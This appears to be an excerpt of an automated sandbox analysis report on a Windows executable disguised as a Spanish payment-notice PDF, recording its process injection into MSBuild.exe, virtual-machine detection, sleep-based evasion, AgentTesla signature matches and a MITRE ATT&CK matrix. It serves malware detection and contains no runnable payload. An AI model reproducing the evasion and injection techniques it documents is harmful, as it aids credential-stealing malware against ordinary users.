                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 15
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Aviso de pago.pdf____________________________.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@0/1
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_01
                    Source: 12.0.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 12.0.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 12.2.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 12.2.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: protobuf-net.pdbSHA256 source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Aviso de pago.pdf____________________________.exe, 00000000.00000002.481679330.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000003.468729915.00000000081F4000.00000004.00000800.00020000.00000000.sdmp, Aviso de pago.pdf____________________________.exe, 00000000.00000002.480672047.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Aviso de pago.pdf____________________________.exe, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.Aviso de pago.pdf____________________________.exe.5d0000.0.unpack, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.Aviso de pago.pdf____________________________.exe.5d0000.0.unpack, Google.cs.Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04967482 push 8B045BD9h; ret
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04967288 push 8B044388h; ret
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_049673CA push 8B044389h; ret
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeCode function: 0_2_04967355 push 8B045BDDh; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0503E1E8 push E802005Eh; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0503E204 push E801025Eh; ret
                    Source: Aviso de pago.pdf____________________________.exeStatic PE information: 0xD0E49B7F [Mon Jan 20 23:55:43 2081 UTC]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe TID: 6404Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe TID: 6284Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 3372Thread sleep count: 130 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6880Thread sleep count: 44 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6880Thread sleep time: -40582836962160988s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6904Thread sleep count: 3523 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6904Thread sleep count: 6312 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3523
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B71008
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeQueries volume information: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_05F22654 GetUserNameW,

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Aviso de pago.pdf____________________________.exe PID: 6232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR
                    Source: Yara matchFile source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Aviso de pago.pdf____________________________.exe.39d0120.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Aviso de pago.pdf____________________________.exe PID: 6232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3272, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping11
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium12
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Query Registry                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Ingress Tool Transfer                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)211
                    Process Injection                    		NTDS131
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
